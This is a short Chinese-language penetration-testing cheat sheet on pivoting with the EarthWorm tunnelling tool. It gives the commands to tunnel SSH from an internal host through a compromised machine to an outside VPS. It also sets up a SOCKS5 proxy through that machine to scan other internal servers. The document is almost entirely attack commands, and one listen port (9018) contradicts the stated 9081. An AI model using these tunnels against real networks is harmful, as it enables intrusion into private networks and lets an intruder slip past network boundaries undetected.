端口转发
目的:将192.168.1.61的22端口转发至vps的9081端口
1.在公网vps(120.92.xx.xx)添加转接隧道,将9081端口收到的代理请求转交给9090端口;
./ew_for_linux64 -s lcx_listen -l 9018 -e 9090(vps)
2.沦陷主机利用lcx_slave方式,将公网VPS的9090端口和B主机的22端口连接起来;
./ew_for_Win.exe -s lcx_slave -d 120.92.xx.xx -e 9090 -f 192.168.1.61 -g 22(沦陷主机)
此时访问120.92.xx.xx的9081端口就等同于访问192.168.1.61的22端口
渗透环境下的端口代理
目的:实现通过vps的9083端口扫描内网的所有服务器(192.168.1.40)
1.在公网vps(120.92.xx.xx)添加转接隧道,将9083端口收到的代理请求转交给9091端口;
./ew_for_linux64 -s lcx_listen -l 9083 -e 9091(vps)
2.socket主机(192.168.1.61)主机正向开启10000端口;
./ew_for_Win.exe -s ssocksd -l 10000(socket服务器)
3.沦陷主机利用lcx_slave方式,将公网VPS的9091端口和socket主机的10000端口连接起来;
./ew_for_Win.exe -s lcx_slave -d 120.92.xx.xx -e 9091 -f 192.168.1.61 -g 10000(沦陷主机)
此时就将192.168.1.61的代理服务器代理至vps的9083端口(socket5)
此时就可以用代理扫描192.168.1.40的服务器了。。